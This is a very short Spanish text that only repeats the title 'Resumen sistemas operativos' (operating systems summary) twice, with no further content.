Resumen sistemas operativos.

Resumen sistemas operativos.